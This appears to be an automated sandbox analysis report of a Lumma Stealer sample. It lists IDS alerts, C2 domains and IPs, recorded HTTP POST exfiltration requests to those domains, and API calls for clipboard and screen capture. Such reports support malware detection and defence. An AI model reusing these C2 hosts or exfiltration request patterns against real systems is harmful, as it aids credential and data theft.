Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx edx, byte ptr [esi]	5_2_0043FFB0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	5_2_0043FFB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49741 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49741 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49770 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49770 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49776 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49814 -> 104.21.74.40:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: mindhandru.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz

Source: Joe Sandbox View

IP Address: 104.21.11.101 104.21.11.101

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49741 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49770 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49790 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49782 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49776 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49814 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49796 -> 104.21.74.40:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49804 -> 104.21.74.40:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: prisonyfork.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: prisonyfork.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SH1RINP2KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12786Host: prisonyfork.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LYXP2HB4CIIUAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15052Host: prisonyfork.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CTNJVND1SNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20524Host: prisonyfork.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OAOG7XGDR905YGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1240Host: prisonyfork.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6ULLK7HUCF7G7QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570559Host: prisonyfork.buzz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: prisonyfork.buzz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic	DNS traffic detected: DNS query: prisonyfork.buzz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz

Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2657473252.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657571584.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2615686778.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2513277599.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2587700923.00000000031F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561905466.000000000588F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.0000000003183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2561982257.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2615787536.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000002.3284275434.00000000057D0000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.3279490490.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2585820862.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000002.3283985421.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2561395114.00000000057D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.000000000319A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/))
Source: 0x001f00000004676d-1858.exe, 00000005.00000002.3284275434.00000000057D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/3g
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2633654001.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2513297201.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657628427.000000000321B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/Y
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615787536.000000000321B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/ak
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.3279512934.0000000003222000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/api
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615787536.000000000321B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/apib
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2513297201.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/apie
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2633654001.000000000321B000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657628427.000000000321B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz/c
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.0000000003183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz:443/api
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.0000000003183000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prisonyfork.buzz:443/apiu
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2563219962.000000000584F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0x001f00000004676d-1858.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514163101.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514259438.0000000005809000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514065868.000000000580C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2562974016.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.40:443 -> 192.168.2.5:49814 version: TLS 1.2

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 5_2_00433440 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

5_2_00433440

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 5_2_05631000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

5_2_05631000

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 5_2_00433440 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

5_2_00433440

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 5_2_00433650 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

5_2_00433650

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B71000	0_2_00B71000
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B7F555	0_2_00B7F555
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B97792	0_2_00B97792
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B89CC0	0_2_00B89CC0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B95C5E	0_2_00B95C5E
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B83FB2	0_2_00B83FB2
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B71000	3_2_00B71000
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B7F555	3_2_00B7F555
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B97792	3_2_00B97792
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B89CC0	3_2_00B89CC0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B95C5E	3_2_00B95C5E
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B83FB2	3_2_00B83FB2
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00423171	5_2_00423171
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041F1A7	5_2_0041F1A7
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00415216	5_2_00415216
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00411A80	5_2_00411A80
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004222A2	5_2_004222A2
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004383E0	5_2_004383E0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043BC30	5_2_0043BC30
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043FCD0	5_2_0043FCD0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00426C90	5_2_00426C90
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0042CD97	5_2_0042CD97
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041BE10	5_2_0041BE10
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00440680	5_2_00440680
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0040DEBE	5_2_0040DEBE
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00438760	5_2_00438760
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00421840	5_2_00421840
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00439000	5_2_00439000
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00408820	5_2_00408820
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0040F838	5_2_0040F838
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004188C8	5_2_004188C8
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004090D0	5_2_004090D0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004260DD	5_2_004260DD
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041D090	5_2_0041D090
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00426090	5_2_00426090
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041409E	5_2_0041409E
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0040B0BC	5_2_0040B0BC
